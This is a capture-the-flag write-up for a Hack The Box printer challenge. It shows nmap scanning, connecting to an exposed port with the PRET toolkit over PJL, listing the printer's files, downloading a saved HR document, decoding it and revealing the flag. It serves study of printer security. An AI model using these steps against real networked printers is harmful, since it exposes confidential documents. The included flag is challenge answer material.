<- HARDWARE

Gawk

3 minutes to read

We are told that someone needs help with a printer. We only have an IP address and a port. nmap does not show any useful information:

$ nmap -Pn -sV 167.99.207.74 -p 32108
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 167.99.207.74
Host is up (0.079s latency).

PORT      STATE SERVICE VERSION
32108/tcp open  unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 97.94 seconds

Using PJL

After reading a bit on printer exploitation, I found PRET, which is a tool to interact with printers using PostScript or PJL (printer languages). It works with Python version 2, so let’s use a Docker container:

$ docker run --rm -v "${PWD}":/home/rocky -it python:2.7 bash
root@48962fe51979:/# pip2.7 install colorama
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support  
Collecting colorama
  Downloading colorama-0.4.6-py2.py3-none-any.whl (25 kB)
Installing collected packages: colorama
Successfully installed colorama-0.4.6
WARNING: You are using pip version 20.0.2; however, version 20.3.4 is available.
You should consider upgrading via the '/usr/local/bin/python -m pip install --upgrade pip' command.
root@48962fe51979:/# python2.7 /home/rocky/PRET/pret.py 167.99.207.74:32108 pjl
      ________________
    _/_______________/|
   /___________/___//||   PRET | Printer Exploitation Toolkit v0.40
  |===        |----| ||    by Jens Mueller <jens.a.mueller@rub.de>
  |           |   ô| ||
  |___________|   ô| ||
  | ||/.´---.||    | ||      「 pentesting tool that made
  |-||/_____\||-.  | |´         dumpster diving obsolete‥ 」
  |_||=L==H==||_|__|/

     (ASCII art by
     Jan Foerster)

Connection to 167.99.207.74:32108 established
Device:   hp LaserJet 4200


Welcome to the pret shell. Type help or ? to list commands.
167.99.207.74:32108:/>

We see that we have successfully connected to a HP LaserJet printer. We can use these options:

167.99.207.74:32108:/> ?

Available commands (type help <topic>):
=======================================
append  delete    edit    free  info    mkdir      printenv  set        unlock
cat     destroy   env     fuzz  load    nvram      put       site       version  
cd      df        exit    get   lock    offline    pwd       status
chvol   disable   find    help  loop    open       reset     timeout
close   discover  flood   hold  ls      pagecount  restart   touch
debug   display   format  id    mirror  print      selftest  traversal

For example:

167.99.207.74:32108:/> pwd  
0:/
167.99.207.74:32108:/> ls
d        -   PJL
d        -   PostScript
d        -   saveDevice
d        -   webServer

Let’s enumerate all files and directories with find:

167.99.207.74:32108:/> find
/PJL/
/PostScript/
/saveDevice/
/saveDevice/SavedJobs/
/saveDevice/SavedJobs/InProgress/
/saveDevice/SavedJobs/InProgress/HR_Policies.pdf  
/saveDevice/SavedJobs/KeepJob/
/webServer/
/webServer/default/
/webServer/default/csconfig
/webServer/home/
/webServer/home/device.html
/webServer/home/hostmanifest
/webServer/lib/
/webServer/lib/keys
/webServer/lib/security
/webServer/objects/
/webServer/permanent/

There is a file that stands out (HR_Policies.pdf). Let’s get it:

167.99.207.74:32108:/> get /saveDevice/SavedJobs/InProgress/HR_Policies.pdf  
41893 bytes received.
167.99.207.74:32108:/> exit

I was expecting a PDF file, but it only contains ASCII data (in fact, a Base64-encoded string):

root@48962fe51979:/# file HR_Policies.pdf
HR_Policies.pdf: ASCII text
root@48962fe51979:/# cat HR_Policies.pdf
JVBERi0xLjQKJdPr6eEKMSAwIG9iago8PC9UaXRsZSAoQm9vayByZXBvcnQpCi9Qcm9kdWNlciAo  
U2tpYS9QREYgbTk0IEdvb2dsZSBEb2NzIFJlbmRlcmVyKT4+CmVuZG9iagozIDAgb2JqCjw8L2Nh
IDEKL0JNIC9Ob3JtYWw+PgplbmRvYmoKNiAwIG9iago8PC9UeXBlIC9YT2JqZWN0Ci9TdWJ0eXBl
IC9JbWFnZQovV2lkdGggNDcKL0hlaWdodCA2Ci9Db2xvclNwYWNlIC9EZXZpY2VSR0IKL0JpdHNQ
ZXJDb21wb25lbnQgOAovRmlsdGVyIC9GbGF0ZURlY29kZQovTGVuZ3RoIDE5Pj4gc3RyZWFtCnic
k1v1UW4UjaJRRA0EAO2J5doKZW5kc3RyZWFtCmVuZG9iago3IDAgb2JqCjw8L1R5cGUgL1hPYmpl
Y3QKL1N1YnR5cGUgL0ltYWdlCi9XaWR0aCAxMjAwCi9IZWlnaHQgMzAKL0NvbG9yU3BhY2UgL0Rl
dmljZVJHQgovQml0c1BlckNvbXBvbmVudCA4Ci9GaWx0ZXIgL0ZsYXRlRGVjb2RlCi9MZW5ndGgg
MTMzPj4gc3RyZWFtCnic7cIxDQAADAMgJ/WfuquD2dgBIV1UVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVfXrA40qTc8KZW5kc3RyZWFtCmVuZG9iago4IDAgb2Jq
...
MCBuIAowMDAwMDIyNjUwIDAwMDAwIG4gCjAwMDAwMjMxMzQgMDAwMDAgbiAKMDAwMDAyOTQ4NSAw
MDAwMCBuIAowMDAwMDI5NzE0IDAwMDAwIG4gCjAwMDAwMjk5NDEgMDAwMDAgbiAKdHJhaWxlcgo8
PC9TaXplIDI4Ci9Sb290IDE1IDAgUgovSW5mbyAxIDAgUj4+CnN0YXJ0eHJlZgozMDM3MgolJUVP
Rg==

So, let’s decode it and save it as a proper PDF file:

root@48962fe51979:/# base64 -d HR_Policies.pdf > /home/rocky/HR_Policies.pdf  
root@48962fe51979:/# file /home/rocky/HR_Policies.pdf
/home/rocky/HR_Policies.pdf: PDF document, version 1.4
root@48962fe51979:/# exit
exit

Flag

If we open the PDF file, we will see the flag in the first page:

Gawk 1

HTB{tr4v3rs3_m4n4g3ment_d3240!}